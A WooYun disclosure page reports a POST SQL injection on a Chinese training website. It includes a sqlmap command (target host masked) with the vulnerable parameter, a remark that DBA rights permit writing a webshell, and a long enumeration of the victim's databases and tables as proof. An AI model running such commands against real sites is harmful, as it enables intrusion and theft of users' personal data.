某培训网sql注射漏洞dba权限大量数据 | wooyun-2015-0163017| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163017

漏洞标题：某培训网sql注射漏洞dba权限大量数据

漏洞作者：路人甲

提交时间：2015-12-21 23:50

修复时间：2016-02-08 18:23

公开时间：2016-02-08 18:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-21：细节已通知厂商并且等待厂商处理中
2015-12-25：厂商已经确认，细节仅向厂商公开
2016-01-04：细节向核心白帽子及相关领域专家公开
2016-01-14：细节向普通白帽子公开
2016-01-24：细节向实习白帽子公开
2016-02-08：细节向公众公开

简要描述：

post注入

详细说明：

直接上sqlmap

python sqlmap.py -u "http://**.**.**.**/knowledge/indexs.aspx"--data="id=55"

dba权限可写shell

好像里面很多数据没时间不跑了

漏洞证明：

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: MySQL 5.0
Database: shop
[6 tables]
+----------------------------------------------+
| jsh_customerinfo                             |
| jsh_customerrecorder                         |
| jsh_log                                      |
| jsh_projectinfo                              |
| jsh_shopinfo                                 |
| jsh_user                                     |
+----------------------------------------------+
Database: jcpeixun
[648 tables]
+----------------------------------------------+
| a_college_users                              |
| a_exam_id                                    |
| a_quesiton_id                                |
| api_rpt_123                                  |
| counter                                      |
| dede_addonarticle                            |
| dede_addonimages                             |
| dede_addoninfos                              |
| dede_addonshop                               |
| dede_addonsoft                               |
| dede_addonspec                               |
| dede_admin                                   |
| dede_admintype                               |
| dede_advancedsearch                          |
| dede_arcatt                                  |
| dede_arccache                                |
| dede_archives                                |
| dede_arcmulti                                |
| dede_arcrank                                 |
| dede_arctiny                                 |
| dede_arctype                                 |
| dede_area                                    |
| dede_channeltype                             |
| dede_co_htmls                                |
| dede_co_mediaurls                            |
| dede_co_note                                 |
| dede_co_onepage                              |
| dede_co_urls                                 |
| dede_diyforms                                |
| dede_dl_log                                  |
| dede_downloads                               |
| dede_erradd                                  |
| dede_feedback                                |
| dede_flink                                   |
| dede_flinktype                               |
| dede_freelist                                |
| dede_homepageset                             |
| dede_keywords                                |
| dede_log                                     |
| dede_member                                  |
| dede_member_company                          |
| dede_member_feed                             |
| dede_member_flink                            |
| dede_member_friends                          |
| dede_member_group                            |
| dede_member_guestbook                        |
| dede_member_model                            |
| dede_member_msg                              |
| dede_member_operation                        |
| dede_member_person                           |
| dede_member_pms                              |
| dede_member_snsmsg                           |
| dede_member_space                            |
| dede_member_stow                             |
| dede_member_stowtype                         |
| dede_member_tj                               |
| dede_member_type                             |
| dede_member_vhistory                         |
| dede_moneycard_record                        |
| dede_moneycard_type                          |
| dede_mtypes                                  |
| dede_multiserv_config                        |
| dede_myad                                    |
| dede_myadtype                                |
| dede_mytag                                   |
| dede_payment                                 |
| dede_plus                                    |
| dede_purview                                 |
| dede_pwd_tmp                                 |
| dede_ratings                                 |
| dede_scores                                  |
| dede_search_cache                            |
| dede_search_keywords                         |
| dede_sgpage                                  |
| dede_shops_delivery                          |
| dede_shops_orders                            |
| dede_shops_products                          |
| dede_shops_userinfo                          |
| dede_softconfig                              |
| dede_sphinx                                  |
| dede_stepselect                              |
| dede_sys_enum                                |
| dede_sys_module                              |
| dede_sys_set                                 |
| dede_sys_task                                |
| dede_sysconfig                               |
| dede_tagindex                                |
| dede_taglist                                 |
| dede_uploads                                 |
| dede_verifies                                |
| dede_vote                                    |
| dede_vote_member                             |
| jc_actionrecord                              |
| jc_activity_exhibition                       |
| jc_adminlogin_information                    |
| jc_advertisement                             |
| jc_apply                                     |
| jc_apply_base                                |
| jc_apply_manage                              |
| jc_apply_project                             |
| jc_asset                                     |
| jc_baiduxml                                  |
| jc_balance_cost                              |
| jc_balance_recharge                          |
| jc_cashcoupons                               |
| jc_cashcoupons_cost                          |
| jc_college_class                             |
| jc_college_dept                              |
| jc_college_logging                           |
| jc_college_power                             |
| jc_college_users_accounts                    |
| jc_colleges                                  |
| jc_course_base                               |
| jc_course_base_category_index                |
| jc_course_chapter                            |
| jc_course_code                               |
| jc_course_node                               |
| jc_course_score                              |
| jc_course_subject                            |
| jc_course_view_log_temporary                 |
| jc_credit_temporary                          |
| jc_device_apply                              |
| jc_drawgift_vmobile                          |
| jc_email_autosrv_clicklog                    |
| jc_email_autosrv_error                       |
| jc_email_autosrv_href                        |
| jc_email_autosrv_loginusers                  |
| jc_email_autosrv_openclicklog                |
| jc_email_autosrv_plan                        |
| jc_email_autosrv_querysql                    |
| jc_email_autosrv_querysql_ed                 |
| jc_email_autosrv_sendgroups                  |
| jc_email_autosrv_sendlog                     |
| jc_email_autosrv_tpl                         |
| jc_email_autosrv_waited                      |
| jc_email_online_sendlog                      |
| jc_exam_certificate                          |
| jc_exam_name                                 |
| jc_exam_pk                                   |
| jc_examlog                                   |
| jc_exams                                     |
| jc_examscore                                 |
| jc_examusers                                 |
| jc_experience_base                           |
| jc_experience_detail                         |
| jc_favorite                                  |
| jc_file_info                                 |
| jc_file_info_app                             |
| jc_freelook_regstatis                        |
| jc_friendlink                                |
| jc_goods_base                                |
| jc_goodsbase_history                         |
| jc_goodsprice_history                        |
| jc_group_initiate                            |
| jc_group_join                                |
| jc_group_log                                 |
| jc_group_temporary                           |
| jc_guide_answer                              |
| jc_guide_feedback                            |
| jc_guide_gqaf                                |
| jc_guide_lesson_clicklog                     |
| jc_guide_question                            |
| jc_guide_question_group                      |
| jc_guide_type                                |
| jc_guide_userdata                            |
| jc_hedy_vote                                 |
| jc_hedy_vote_history                         |
| jc_invitation_activation_card                |
| jc_invitation_activation_history             |
| jc_invitation_beforegrade                    |
| jc_invitation_link                           |
| jc_jcb_deal                                  |
| jc_job_resume_baseinfo                       |
| jc_job_resume_baseinfo_detail                |
| jc_job_resume_cert                           |
| jc_job_resume_edu                            |
| jc_job_resume_pro_experience                 |
| jc_job_resume_workexerience                  |
| jc_ke_qq_apply                               |
| jc_ke_qq_lottery                             |
| jc_learncoin_base                            |
| jc_learncoin_history                         |
| jc_learncoin_passage                         |
| jc_learner_base                              |
| jc_learner_detail                            |
| jc_learner_gainrecord                        |
| jc_learner_gradechange                       |
| jc_learner_heartfelt                         |
| jc_learner_history                           |
| jc_learner_invite                            |
| jc_learner_join                              |
| jc_learner_key                               |
| jc_learner_lessions                          |
| jc_learner_login_log                         |
| jc_learner_mission                           |
| jc_learner_mission_action                    |
| jc_learner_mission_base                      |
| jc_learner_mission_extend                    |
| jc_learner_mission_reward                    |
| jc_learner_orderform                         |
| jc_learner_position                          |
| jc_learner_recommend                         |
| jc_learner_recommends                        |
| jc_learner_report                            |
| jc_learner_search                            |
| jc_learner_story                             |
| jc_learner_video_viewlog                     |
| jc_lector_attention                          |
| jc_lector_base                               |
| jc_lector_extendlink                         |
| jc_lector_hotline                            |
| jc_lecture_apply                             |
| jc_lecture_base                              |
| jc_lessoninfo                                |
| jc_limit_qa                                  |
| jc_login_information                         |
| jc_login_log                                 |
| jc_lxtest                                    |
| jc_message                                   |
| jc_mobile_area_contrast                      |
| jc_mobilereg_send_member                     |
| jc_mp_lesson_collect                         |
| jc_mp_play_analysis                          |
| jc_mp_userinfo                               |
| jc_name3                                     |
| jc_old_orderlist                             |
| jc_old_viporder                              |
| jc_oneyuangou_events                         |
| jc_oneyuangou_prizecode                      |
| jc_online_session                            |
| jc_onlinecoach                               |
| jc_onlinereply                               |
| jc_order_goods_relation                      |
| jc_order_lesson                              |
| jc_order_lesson_deatail                      |
| jc_order_procrecord                          |
| jc_orderlesson_log                           |
| jc_partner_buymessage                        |
| jc_partner_mobile                            |
| jc_partner_mobile_all                        |
| jc_pay_log                                   |
| jc_plan                                      |
| jc_plan_record                               |
| jc_player_version                            |
| jc_preferential_card                         |
| jc_preferential_card_item                    |
| jc_preferential_card_relation                |
| jc_product                                   |
| jc_questions                                 |
| jc_remotemeeting                             |
| jc_renew_coupons                             |
| jc_scale_urljump                             |
| jc_shopping_cart                             |
| jc_siemens_exam_apply                        |
| jc_siemens_exam_mission                      |
| jc_sitemap                                   |
| jc_sitemap_detail                            |
| jc_sms_send_error                            |
| jc_sms_send_log                              |
| jc_smsemailpost_temporary                    |
| jc_smsverifycode                             |
| jc_smsxs_rec                                 |
| jc_smsxs_rpt                                 |
| jc_stat_videorecord                          |
| jc_union_class                               |
| jc_union_class_syllabus                      |
| jc_univers                                   |
| jc_univers_administrator                     |
| jc_univers_channel                           |
| jc_univers_class                             |
| jc_univers_dept                              |
| jc_univers_join                              |
| jc_univers_lesson                            |
| jc_univers_logging                           |
| jc_univers_power                             |
| jc_univers_users_accounts                    |
| jc_user_teacher_questions                    |
| jc_verification_code                         |
| jc_video_advertising                         |
| jc_video_capture_error                       |
| jc_video_error_menu                          |
| jc_video_logging                             |
| jc_video_logs                                |
| jc_video_member_application                  |
| jc_video_message                             |
| jc_video_messagereply                        |
| jc_video_record_visitor                      |
| jc_weipei                                    |
| jc_windowsserver_lock                        |
| jc_yy_callmobile                             |
| jc_yy_interest                               |
| jc_yy_learner_problem                        |
| jc_zd_administrator                          |
| jc_zd_answer                                 |
| jc_zd_channel                                |
| jc_zd_question                               |
| jccrm_custom                                 |
| jccrm_custom_distribution                    |
| jccrm_custom_rule                            |
| jccrm_mobile_locate                          |
| jccrm_user_base                              |
| jcservice_task                               |
| jcsms_receive                                |
| jcsms_send                                   |
| jcsys_ad_price_date                          |
| jcsys_ad_profit_loss                         |
| jcsys_category_base                          |
| jcsys_category_custom                        |
| jcsys_category_relation                      |
| jcsys_config                                 |
| jcsys_dept_base                              |
| jcsys_dept_user_relation                     |
| jcsys_dictionary                             |
| jcsys_evaluation                             |
| jcsys_filter_dictionary                      |
| jcsys_info_base                              |
| jcsys_info_content                           |
| jcsys_info_tag                               |
| jcsys_integral_log                           |
| jcsys_message                                |
| jcsys_message_back_base                      |
| jcsys_message_back_content                   |
| jcsys_message_base                           |
| jcsys_message_content                        |
| jcsys_onlinecs                               |
| jcsys_operate_log                            |
| jcsys_order                                  |
| jcsys_order_info                             |
| jcsys_orderdetail                            |
| jcsys_pay_info                               |
| jcsys_privilege_base                         |
| jcsys_privilege_users                        |
| jcsys_scratchcards                           |
| jcsys_socket_log                             |
| jcsys_task_process                           |
| jcsys_template                               |
| jcsys_template_priv_relation                 |
| jcsys_updategrade_log                        |
| jcsys_user_base                              |
| jcsys_user_tmp                               |
| jcsys_video_comment                          |
| jct_videorecord                              |
| jct_videorecord_course_day_stat              |
| jct_videorecord_day_stat                     |
| oldfileinfo                                  |
| oldorderdetails                              |
| pre_alj_count                                |
| pre_alj_count_pro                            |
| pre_common_addon                             |
| pre_common_admincp_cmenu                     |
| pre_common_admincp_group                     |
| pre_common_admincp_member                    |
| pre_common_admincp_perm                      |
| pre_common_admincp_session                   |
| pre_common_admingroup                        |
| pre_common_adminnote                         |
| pre_common_advertisement                     |
| pre_common_advertisement_custom              |
| pre_common_banned                            |
| pre_common_block                             |
| pre_common_block_favorite                    |
| pre_common_block_item                        |
| pre_common_block_item_data                   |
| pre_common_block_permission                  |
| pre_common_block_pic                         |
| pre_common_block_style                       |
| pre_common_block_xml                         |
| pre_common_cache                             |
| pre_common_card                              |
| pre_common_card_log                          |
| pre_common_card_type                         |
| pre_common_connect_guest                     |
| pre_common_credit_log                        |
| pre_common_credit_rule                       |
| pre_common_credit_rule_log                   |
| pre_common_credit_rule_log_field             |
| pre_common_cron                              |
| pre_common_devicetoken                       |
| pre_common_district                          |
| pre_common_diy_data                          |
| pre_common_domain                            |
| pre_common_failedlogin                       |
| pre_common_friendlink                        |
| pre_common_grouppm                           |
| pre_common_invite                            |
| pre_common_magic                             |
| pre_common_magiclog                          |
| pre_common_mailcron                          |
| pre_common_mailqueue                         |
| pre_common_member                            |
| pre_common_member_action_log                 |
| pre_common_member_connect                    |
| pre_common_member_count                      |
| pre_common_member_crime                      |
| pre_common_member_field_forum                |
| pre_common_member_field_home                 |
| pre_common_member_grouppm                    |
| pre_common_member_log                        |
| pre_common_member_magic                      |
| pre_common_member_medal                      |
| pre_common_member_profile                    |
| pre_common_member_profile_setting            |
| pre_common_member_security                   |
| pre_common_member_stat_field                 |
| pre_common_member_stat_fieldcache            |
| pre_common_member_stat_search                |
| pre_common_member_stat_searchcache           |
| pre_common_member_status                     |
| pre_common_member_validate                   |
| pre_common_member_verify                     |
| pre_common_member_verify_info                |
| pre_common_moderate                          |
| pre_common_myapp                             |
| pre_common_myinvite                          |
| pre_common_mytask                            |
| pre_common_nav                               |
| pre_common_onlinetime                        |
| pre_common_patch                             |
| pre_common_plugin                            |
| pre_common_pluginvar                         |
| pre_common_process                           |
| pre_common_regip                             |
| pre_common_relatedlink                       |
| pre_common_report                            |
| pre_common_searchindex                       |
| pre_common_secquestion                       |
| pre_common_session                           |
| pre_common_setting                           |
| pre_common_smiley                            |
| pre_common_sphinxcounter                     |
| pre_common_stat                              |
| pre_common_statuser                          |
| pre_common_style                             |
| pre_common_stylevar                          |
| pre_common_syscache                          |
| pre_common_tag                               |
| pre_common_tagitem                           |
| pre_common_task                              |
| pre_common_taskvar                           |
| pre_common_template                          |
| pre_common_template_block                    |
| pre_common_template_permission               |
| pre_common_uin_black                         |
| pre_common_usergroup                         |
| pre_common_usergroup_field                   |
| pre_common_word                              |
| pre_common_word_type                         |
| pre_connect_disktask                         |
| pre_connect_feedlog                          |
| pre_connect_memberbindlog                    |
| pre_connect_postfeedlog                      |
| pre_connect_tlog                             |
| pre_connect_tthreadlog                       |
| pre_forum_access                             |
| pre_forum_activity                           |
| pre_forum_activityapply                      |
| pre_forum_announcement                       |
| pre_forum_attachment                         |
| pre_forum_attachment_0                       |
| pre_forum_attachment_1                       |
| pre_forum_attachment_2                       |
| pre_forum_attachment_3                       |
| pre_forum_attachment_4                       |
| pre_forum_attachment_5                       |
| pre_forum_attachment_6                       |
| pre_forum_attachment_7                       |
| pre_forum_attachment_8                       |
| pre_forum_attachment_9                       |
| pre_forum_attachment_exif                    |
| pre_forum_attachment_unused                  |
| pre_forum_attachtype                         |
| pre_forum_bbcode                             |
| pre_forum_collection                         |
| pre_forum_collectioncomment                  |
| pre_forum_collectionfollow                   |
| pre_forum_collectioninvite                   |
| pre_forum_collectionrelated                  |
| pre_forum_collectionteamworker               |
| pre_forum_collectionthread                   |
| pre_forum_creditslog                         |
| pre_forum_debate                             |
| pre_forum_debatepost                         |
| pre_forum_faq                                |
| pre_forum_forum                              |
| pre_forum_forum_threadtable                  |
| pre_forum_forumfield                         |
| pre_forum_forumrecommend                     |
| pre_forum_groupcreditslog                    |
| pre_forum_groupfield                         |
| pre_forum_groupinvite                        |
| pre_forum_grouplevel                         |
| pre_forum_groupranking                       |
| pre_forum_groupuser                          |
| pre_forum_imagetype                          |
| pre_forum_imgpoll                            |
| pre_forum_imgpolloption                      |
| pre_forum_medal                              |
| pre_forum_medallog                           |
| pre_forum_memberrecommend                    |
| pre_forum_moderator                          |
| pre_forum_modwork                            |
| pre_forum_onlinelist                         |
| pre_forum_order                              |
| pre_forum_poll                               |
| pre_forum_polloption                         |
| pre_forum_pollvoter                          |
| pre_forum_post                               |
| pre_forum_post_location                      |
| pre_forum_post_moderate                      |
| pre_forum_post_tableid                       |
| pre_forum_postcache                          |
| pre_forum_postcomment                        |
| pre_forum_postlog                            |
| pre_forum_postposition                       |
| pre_forum_poststick                          |
| pre_forum_promotion                          |
| pre_forum_ratelog                            |
| pre_forum_relatedthread                      |
| pre_forum_replycredit                        |
| pre_forum_rsscache                           |
| pre_forum_spacecache                         |
| pre_forum_statlog                            |
| pre_forum_thread                             |
| pre_forum_thread_moderate                    |
| pre_forum_threadaddviews                     |
| pre_forum_threadclass                        |
| pre_forum_threadclosed                       |
| pre_forum_threaddisablepos                   |
| pre_forum_threadimage                        |
| pre_forum_threadlog                          |
| pre_forum_threadmod                          |
| pre_forum_threadpartake                      |
| pre_forum_threadpreview                      |
| pre_forum_threadrush                         |
| pre_forum_threadtype                         |
| pre_forum_trade                              |
| pre_forum_tradecomment                       |
| pre_forum_tradelog                           |
| pre_forum_typeoption                         |
| pre_forum_typeoptionvar                      |
| pre_forum_typevar                            |
| pre_forum_warning                            |
| pre_home_album                               |
| pre_home_album_category                      |
| pre_home_appcreditlog                        |
| pre_home_blacklist                           |
| pre_home_blog                                |
| pre_home_blog_category                       |
| pre_home_blog_moderate                       |
| pre_home_blogfield                           |
| pre_home_class                               |
| pre_home_click                               |
| pre_home_clickuser                           |
| pre_home_comment                             |
| pre_home_comment_moderate                    |
| pre_home_docomment                           |
| pre_home_doing                               |
| pre_home_doing_moderate                      |
| pre_home_favorite                            |
| pre_home_feed                                |
| pre_home_feed_app                            |
| pre_home_follow                              |
| pre_home_follow_feed                         |
| pre_home_follow_feed_archiver                |
| pre_home_friend                              |
| pre_home_friend_request                      |
| pre_home_friendlog                           |
| pre_home_notification                        |
| pre_home_pic                                 |
| pre_home_pic_moderate                        |
| pre_home_picfield                            |
| pre_home_poke                                |
| pre_home_pokearchive                         |
| pre_home_share                               |
| pre_home_share_moderate                      |
| pre_home_show                                |
| pre_home_specialuser                         |
| pre_home_userapp                             |
| pre_home_userappfield                        |
| pre_home_visitor                             |
| pre_mobile_setting                           |
| pre_myrepeats                                |
| pre_onemary_albumsearch_views                |
| pre_plugin_auction                           |
| pre_plugin_auction_message                   |
| pre_plugin_auction_xml                       |
| pre_plugin_auctionapply                      |
| pre_plugin_ljmajia                           |
| pre_plugin_session                           |
| pre_plugin_vfastpost_myforum                 |
| pre_plugin_vfastpost_stat                    |
| pre_portal_article_content                   |
| pre_portal_article_count                     |
| pre_portal_article_moderate                  |
| pre_portal_article_related                   |
| pre_portal_article_title                     |
| pre_portal_article_trash                     |
| pre_portal_attachment                        |
| pre_portal_category                          |
| pre_portal_category_permission               |
| pre_portal_comment                           |
| pre_portal_comment_moderate                  |
| pre_portal_rsscache                          |
| pre_portal_topic                             |
| pre_portal_topic_pic                         |
| pre_security_evilpost                        |
| pre_security_eviluser                        |
| pre_security_failedlog                       |
| pre_ucenter_admins                           |
| pre_ucenter_applications                     |
| pre_ucenter_badwords                         |
| pre_ucenter_domains                          |
| pre_ucenter_failedlogins                     |
| pre_ucenter_feeds                            |
| pre_ucenter_friends                          |
| pre_ucenter_mailqueue                        |
| pre_ucenter_memberfields                     |
| pre_ucenter_members                          |
| pre_ucenter_mergemembers                     |
| pre_ucenter_newpm                            |
| pre_ucenter_notelist                         |
| pre_ucenter_pm_indexes                       |
| pre_ucenter_pm_lists                         |
| pre_ucenter_pm_members                       |
| pre_ucenter_pm_messages_0                    |
| pre_ucenter_pm_messages_1                    |
| pre_ucenter_pm_messages_2                    |
| pre_ucenter_pm_messages_3                    |
| pre_ucenter_pm_messages_4                    |
| pre_ucenter_pm_messages_5                    |
| pre_ucenter_pm_messages_6                    |
| pre_ucenter_pm_messages_7                    |
| pre_ucenter_pm_messages_8                    |
| pre_ucenter_pm_messages_9                    |
| pre_ucenter_protectedmembers                 |
| pre_ucenter_settings                         |
| pre_ucenter_sqlcache                         |
| pre_ucenter_tags                             |
| pre_ucenter_teacher                          |
| pre_ucenter_vars                             |
| silver_user                                  |
| sqlmapoutput                                 |
| sys_report_date                              |
| tt                                           |
| z_app_url                                    |
| z_lm_order                                   |
| z_xb_sheet1                                  |
| z_zw_11_6                                    |
+----------------------------------------------+
Database: jcpeixun_tj
[31 tables]
+----------------------------------------------+
| tj_cache                                     |
| tj_log_201311                                |
| tj_log_201312                                |
| tj_log_201401                                |
| tj_log_201402                                |
| tj_log_201403                                |
| tj_log_201404                                |
| tj_log_201405                                |
| tj_log_201406                                |
| tj_log_201407                                |
| tj_log_201408                                |
| tj_log_201409                                |
| tj_log_201410                                |
| tj_log_201411                                |
| tj_log_201412                                |
| tj_log_201501                                |
| tj_log_201502                                |
| tj_log_201503                                |
| tj_log_201504                                |
| tj_log_201505                                |
| tj_log_201506                                |
| tj_log_201507                                |
| tj_log_201508                                |
| tj_log_201509                                |
| tj_log_201510                                |
| tj_log_201511                                |
| tj_log_201512                                |
| tj_log_eamil                                 |
| tj_log_err                                   |
| tj_log_order                                 |
| tt                                           |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: jc_union_org
[23 tables]
+----------------------------------------------+
| jc_u_email                                   |
| jc_u_email_send_log                          |
| jc_u_email_sys_log                           |
| jc_union_anli                                |
| jc_union_anli_comment                        |
| jc_union_apply                               |
| jc_union_apply_teacher                       |
| jc_union_class                               |
| jc_union_class_syllabus                      |
| jc_union_comment                             |
| jc_union_events                              |
| jc_union_imgs                                |
| jc_union_lesson                              |
| jc_union_lesson_content_tags                 |
| jc_union_lesson_view                         |
| jc_union_lesson_view_detail                  |
| jc_union_lessonarea                          |
| jc_union_message                             |
| jc_union_news                                |
| jc_union_orgs                                |
| jc_union_orgs_contact                        |
| jccrm_notice                                 |
| zwu_1_copy                                   |
+----------------------------------------------+
Database: gdmes
[22 tables]
+----------------------------------------------+
| aboutme                                      |
| articles                                     |
| eduorders                                    |
| jc_friendlink                                |
| jcsys_operate_log                            |
| magazine                                     |
| magazinechapter                              |
| mes_app                                      |
| mes_app_file                                 |
| mes_asiautc                                  |
| mes_category                                 |
| mes_expert                                   |
| mes_member_base                              |
| mes_user_base                                |
| news                                         |
| personbase                                   |
| personedu                                    |
| personother                                  |
| personwork                                   |
| serial                                       |
| userfiles                                    |
| v_jc_mp_lesson_collect                       |
+----------------------------------------------+
Database: jicheng_app_db
[12 tables]
+----------------------------------------------+
| appversion                                   |
| authorization_record                         |
| courses                                      |
| courses_category                             |
| courses_chapter                              |
| courses_favorites                            |
| courses_learn_record                         |
| manager                                      |
| news_list                                    |
| news_read_record                             |
| order_record                                 |
| order_status                                 |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: jc_job_resume
[41 tables]
+----------------------------------------------+
| date_formate                                 |
| date_formate_hour                            |
| jc_job_area                                  |
| jc_job_area_new                              |
| jc_job_brand                                 |
| jc_job_collect_searchkeyword                 |
| jc_job_duty                                  |
| jc_job_emailsend_sign                        |
| jc_job_enterprise_ads                        |
| jc_job_enterprise_authorize                  |
| jc_job_enterprise_deposit                    |
| jc_job_enterprise_gradechange_log            |
| jc_job_enterprise_job                        |
| jc_job_enterprise_job_extrfield              |
| jc_job_enterprise_user                       |
| jc_job_feedback                              |
| jc_job_industry                              |
| jc_job_issue                                 |
| jc_job_issue_type                            |
| jc_job_lottery                               |
| jc_job_lottery_name                          |
| jc_job_lottery_share                         |
| jc_job_message                               |
| jc_job_product                               |
| jc_job_resume_baseinfo                       |
| jc_job_resume_baseinfo_detail                |
| jc_job_resume_box                            |
| jc_job_resume_cert                           |
| jc_job_resume_edu                            |
| jc_job_resume_message                        |
| jc_job_resume_pro_experience                 |
| jc_job_resume_seen                           |
| jc_job_resume_seen_detail                    |
| jc_job_resume_skill                          |
| jc_job_resume_workexerience                  |
| jc_job_subject                               |
| jc_job_subject_reply                         |
| jc_job_user_baseinfo                         |
| jcsys_message_base                           |
| jcsys_message_content                        |
| v_jc_job_resume_box                          |
+----------------------------------------------+
Database: loudi
[24 tables]
+----------------------------------------------+
| ef_course_base                               |
| ef_learner_account                           |
| ef_learner_account_log                       |
| ef_learner_base                              |
| ef_lesson_base                               |
| ef_order_base                                |
| ef_question_bank                             |
| ef_study_base                                |
| ef_study_card                                |
| ef_study_course                              |
| ef_study_log                                 |
| jc_lector_base                               |
| jcsys_category_base                          |
| jcsys_dept_base                              |
| jcsys_dept_user_relation                     |
| jcsys_dictionary                             |
| jcsys_info_base                              |
| jcsys_info_content                           |
| jcsys_operate_log                            |
| jcsys_privilege_base                         |
| jcsys_privilege_users                        |
| jcsys_template                               |
| jcsys_template_priv_relation                 |
| jcsys_user_base                              |
+----------------------------------------------+
Database: jcpeixun_exam
[6 tables]
+----------------------------------------------+
| examlog                                      |
| exams                                        |
| examscore                                    |
| examusers                                    |
| jcsys_operate_log                            |
| questions                                    |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-12-25 18:54

厂商回复：

CNVD未直接复现所述漏洞情况，暂未建立与网站管理单位的直接处置渠道，待认领。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163017

漏洞标题：某培训网sql注射漏洞dba权限大量数据

相关厂商：计成培训网

漏洞作者：路人甲

提交时间：2015-12-21 23:50

修复时间：2016-02-08 18:23

公开时间：2016-02-08 18:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163017

漏洞标题：某培训网sql注射漏洞dba权限大量数据

相关厂商：计成培训网

漏洞作者： 路人甲

提交时间：2015-12-21 23:50

修复时间：2016-02-08 18:23

公开时间：2016-02-08 18:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0163017"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云